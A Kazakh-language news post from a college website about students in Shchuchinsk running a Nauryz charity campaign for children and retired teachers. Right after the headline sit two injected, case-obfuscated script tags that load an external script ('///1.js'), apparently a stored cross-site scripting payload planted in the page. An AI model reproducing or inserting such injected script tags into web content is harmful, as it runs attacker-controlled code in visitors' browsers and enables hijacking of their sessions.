«Наурыз - мейірім мен қайырымдылық мерекесі»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.03.2021

Әр жасаған жақсылық адамның өзіне қайтарылады.

Наурыз мейрамын мерекелеу қарсаңында Щучинск қаласының Жоғары техникалық колледжінің студенттері «Наурыз - мейірім мен қайырымдылық мерекесі» атты қайырымдылық акциясын өткізді. Акция барысында Щучинск қаласының сәбилер үйінде тұратын балаларға, сондай-ақ педагогикалық еңбек ардагерлеріне назар аударылды. Балалар 20-дан астам зейнеткелерге барып, шағын сыйлықтар жасап, үй істеріне көмек көрсетті.

18 наурыз күні педагогикалық еңбек ардагерлерді шақыра отырып, «Ардагерлерді ардақтайық"!» салтанатты іс-шарасы өтті. Колледждің педагогикалық ұжымы концерттік бағдарлама дайындап, қатысушылардың әрқайсысына естелік  кәдесыйлар  табыс  етілді.

Мұқтаж адамдарға көмектесу деген игі істердің бірі. Біз міндетті түрде бұл жақсы дәстүрді жалғастырамыз!

Просмотров: 682


Пікір қосу



Деректерді қолтаңбаға қосу
Текст